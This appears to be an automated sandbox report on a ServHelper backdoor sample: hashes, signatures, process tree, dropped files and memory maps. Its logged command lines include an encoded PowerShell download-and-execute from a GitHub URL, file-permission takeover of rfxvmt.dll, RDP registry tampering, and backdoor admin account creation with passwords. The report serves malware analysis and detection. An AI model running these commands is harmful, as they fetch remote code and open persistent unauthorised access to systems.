Analysis
-
max time kernel
134s -
max time network
122s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-06-2021 14:59
General
-
Target
20f307c716a689f4afa3a76b7143db22.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 21 IoCs
-
Modifies data under HKEY_USERS 4 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA489.tmp" "c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cjzofg0a /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc cjzofg0a /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cjzofg0a /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cjzofg0a1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc cjzofg0a2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cjzofg0a3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0042da65-6a0d-444e-9182-5657141093a5MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01beae65-39e3-4a60-a039-e3a50d156d50MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_059a5047-28df-458f-9a3f-70af485306fbMD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2a69743f-de4c-4302-88b9-02014f035850MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e9c5d27-4903-4f49-aa18-33ffc5ff0076MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_88330b45-5718-4cdc-84ab-1c354903508eMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6d77ca6-de71-47cb-8071-792c0cb0e9ebMD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
6ea4a38d903d92b829e92e7c36b1facc
SHA1051052126538ccd866f919dd78a302af42820a4d
SHA25671925e822449eae8c589c4f7e502f39bc3f6a7f6f04d19399c494166ac369630
SHA512bc61c6f4e9d979cc08e9d513e3e33255a7e49627332e4cbb3bee7f4ee813c56a4704df1b13b41d0b7c12ca77011558bdcbd2c29349798892ae23d3a39a316ae0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
cf284edd4e3dc7703d11a5a9de2b6960
SHA1f26058acfdbbb4a242d51584666ed9abf56d6500
SHA256e6037f85bc79a45ab5f98412d2e4696d4eae43115fb230ec4ccb8e1b7ea6c591
SHA5123295175a29910a25012b25a3b874273511d993bc8ecc8ac343fc3b92fabff4d699aaa509d4b86339a897281814bee1d8afd8f8120b92dbff0bf219ece47a807a
-
C:\Users\Admin\AppData\Local\Temp\RESA489.tmpMD5
9f4cbc0cf291525302c02948f07597b6
SHA103e63f57c062b44ede0df916efa9f07242f5d83e
SHA256ca0d1cff1d0026e27b315378caa05df073b3a57e145bc8aaef72c34d02d3f496
SHA5128a7dc4c48b4a7c5940706368a6739a8e265b882c18cc154545e38cdff942e066a3efb352faadbc7e8d03def09c0c30e88c3b87f19d6ca8e8f8fca76715d37f51
-
C:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.dllMD5
304797b1978f10d26c405645f2f9676f
SHA1cceaf42852f5e62128e4a4702db11b5f31f931f2
SHA256648659248d1997df43c32cec911dae42618d9afdce9acc03127a048b83cc5482
SHA5120bbd45a1ddb82bf251cbf9a59b33db592ecb4d124e6afb77fdec7b466556abfaff333dc7bf43c66fa45725393f9a1c29b973abd557003dc19c0676be5265bb64
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
baea9da2a5adf3d3555d141943d5c252
SHA1c8851e4ec4255569e88b4a1b204ab213837afabf
SHA256fe28bfd58e8997b0e017fa6c780a108630bd6ec0a65a928263764a646f690656
SHA51251e2539b3e0c8b6709c110c8c4b697f8424e79bdb5187bb025d0330f415af0bbde9a923be54e580faf1f097f1718b411bad85bd0d764eff8effc916d0b719a8c
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\CSCDBCC0248C7A847EBA4688113AFEA8E2.TMPMD5
c0b2d968396e781ec16b639ef8d854ec
SHA1f4862407da18d10d1404c866f0b1b7f134bd8480
SHA256685a106757616dfd046d43ceb802001deb7cc07ef913b4673646711ebe8c5c71
SHA512ad09df30b0d630da155f4a12143a2149b63de774fef4d6668c65cd5a2f09220299f595312edbb5956001fe1e496864b68cba4b430e0dd7b3edd51dbf7ed701c1
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\gzhxopf0\gzhxopf0.cmdlineMD5
6a9ce746dbc6343db54528e8258f1708
SHA1a7373d221424027ba4b6da999474a341e67a00ef
SHA2566c7d1e4e13f344bf196e175a3645e644cf6129e14b1d32c5c32c9caae8dfaa1b
SHA512e27caca198a438ff775177d06d86c49989968245d15eb1cd8f1410766f52497c6451b4072a4fab493e8f33ff6a18b1504f8b0f824d2d4375c4f69b60a0e0a906
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/300-173-0x0000000000000000-mapping.dmp
-
memory/456-172-0x0000000000000000-mapping.dmp
-
memory/536-181-0x0000000000000000-mapping.dmp
-
memory/576-163-0x0000000000000000-mapping.dmp
-
memory/636-177-0x0000000000000000-mapping.dmp
-
memory/752-182-0x0000000000000000-mapping.dmp
-
memory/828-186-0x0000000000000000-mapping.dmp
-
memory/860-165-0x0000000000000000-mapping.dmp
-
memory/888-191-0x0000000000000000-mapping.dmp
-
memory/1004-189-0x0000000000000000-mapping.dmp
-
memory/1008-133-0x000000001A9E0000-0x000000001A9E1000-memory.dmpFilesize
4KB
-
memory/1008-121-0x0000000000000000-mapping.dmp
-
memory/1008-134-0x0000000002470000-0x0000000002471000-memory.dmpFilesize
4KB
-
memory/1008-131-0x000000001B770000-0x000000001B771000-memory.dmpFilesize
4KB
-
memory/1008-129-0x0000000002500000-0x0000000002501000-memory.dmpFilesize
4KB
-
memory/1008-127-0x000000001A964000-0x000000001A966000-memory.dmpFilesize
8KB
-
memory/1008-126-0x000000001A960000-0x000000001A962000-memory.dmpFilesize
8KB
-
memory/1064-157-0x0000000000000000-mapping.dmp
-
memory/1072-194-0x0000000000000000-mapping.dmp
-
memory/1084-207-0x0000000000000000-mapping.dmp
-
memory/1084-185-0x0000000000000000-mapping.dmp
-
memory/1100-64-0x0000000040FB7000-0x0000000040FB8000-memory.dmpFilesize
4KB
-
memory/1100-62-0x0000000040FB4000-0x0000000040FB6000-memory.dmpFilesize
8KB
-
memory/1100-61-0x0000000040FB2000-0x0000000040FB4000-memory.dmpFilesize
8KB
-
memory/1100-59-0x0000000041660000-0x0000000041A81000-memory.dmpFilesize
4.1MB
-
memory/1100-63-0x0000000040FB6000-0x0000000040FB7000-memory.dmpFilesize
4KB
-
memory/1116-168-0x0000000000000000-mapping.dmp
-
memory/1132-195-0x0000000000000000-mapping.dmp
-
memory/1160-78-0x0000000000000000-mapping.dmp
-
memory/1212-164-0x0000000000000000-mapping.dmp
-
memory/1212-190-0x0000000000000000-mapping.dmp
-
memory/1216-160-0x0000000000000000-mapping.dmp
-
memory/1256-167-0x0000000000000000-mapping.dmp
-
memory/1276-176-0x0000000000000000-mapping.dmp
-
memory/1288-75-0x0000000000000000-mapping.dmp
-
memory/1376-188-0x0000000000000000-mapping.dmp
-
memory/1384-206-0x0000000000000000-mapping.dmp
-
memory/1388-204-0x00000000196CA000-0x00000000196E9000-memory.dmpFilesize
124KB
-
memory/1388-203-0x00000000196C4000-0x00000000196C6000-memory.dmpFilesize
8KB
-
memory/1388-202-0x00000000196C0000-0x00000000196C2000-memory.dmpFilesize
8KB
-
memory/1388-196-0x0000000000000000-mapping.dmp
-
memory/1436-187-0x0000000000000000-mapping.dmp
-
memory/1576-183-0x0000000000000000-mapping.dmp
-
memory/1632-192-0x0000000000000000-mapping.dmp
-
memory/1672-148-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/1672-150-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/1672-142-0x0000000000000000-mapping.dmp
-
memory/1672-178-0x0000000000000000-mapping.dmp
-
memory/1684-193-0x0000000000000000-mapping.dmp
-
memory/1684-170-0x0000000000000000-mapping.dmp
-
memory/1696-174-0x0000000000000000-mapping.dmp
-
memory/1700-169-0x0000000000000000-mapping.dmp
-
memory/1708-85-0x000000001C2B0000-0x000000001C2B1000-memory.dmpFilesize
4KB
-
memory/1708-101-0x000000001AD2A000-0x000000001AD49000-memory.dmpFilesize
124KB
-
memory/1708-65-0x0000000000000000-mapping.dmp
-
memory/1708-156-0x000000001C7F0000-0x000000001C7F1000-memory.dmpFilesize
4KB
-
memory/1708-66-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmpFilesize
8KB
-
memory/1708-67-0x0000000002380000-0x0000000002381000-memory.dmpFilesize
4KB
-
memory/1708-86-0x0000000002700000-0x0000000002701000-memory.dmpFilesize
4KB
-
memory/1708-68-0x000000001ADA0000-0x000000001ADA1000-memory.dmpFilesize
4KB
-
memory/1708-69-0x00000000023C0000-0x00000000023C1000-memory.dmpFilesize
4KB
-
memory/1708-84-0x000000001B650000-0x000000001B651000-memory.dmpFilesize
4KB
-
memory/1708-82-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1708-70-0x000000001AD20000-0x000000001AD22000-memory.dmpFilesize
8KB
-
memory/1708-71-0x000000001AD24000-0x000000001AD26000-memory.dmpFilesize
8KB
-
memory/1708-72-0x00000000023F0000-0x00000000023F1000-memory.dmpFilesize
4KB
-
memory/1708-74-0x000000001AC40000-0x000000001AC41000-memory.dmpFilesize
4KB
-
memory/1744-166-0x0000000000000000-mapping.dmp
-
memory/1744-184-0x0000000000000000-mapping.dmp
-
memory/1768-95-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/1768-94-0x000000001AB74000-0x000000001AB76000-memory.dmpFilesize
8KB
-
memory/1768-97-0x000000001AAD0000-0x000000001AAD1000-memory.dmpFilesize
4KB
-
memory/1768-99-0x000000001A9F0000-0x000000001A9F1000-memory.dmpFilesize
4KB
-
memory/1768-100-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/1768-87-0x0000000000000000-mapping.dmp
-
memory/1768-106-0x000000001B670000-0x000000001B671000-memory.dmpFilesize
4KB
-
memory/1768-93-0x000000001AB70000-0x000000001AB72000-memory.dmpFilesize
8KB
-
memory/1768-119-0x000000001B6E0000-0x000000001B6E1000-memory.dmpFilesize
4KB
-
memory/1768-120-0x000000001B6F0000-0x000000001B6F1000-memory.dmpFilesize
4KB
-
memory/1800-205-0x0000000000000000-mapping.dmp
-
memory/1856-208-0x0000000000000000-mapping.dmp
-
memory/1856-159-0x0000000000000000-mapping.dmp
-
memory/1960-161-0x0000000000000000-mapping.dmp
-
memory/2000-162-0x0000000000000000-mapping.dmp
-
memory/2028-171-0x0000000000000000-mapping.dmp
-
memory/2032-175-0x0000000000000000-mapping.dmp
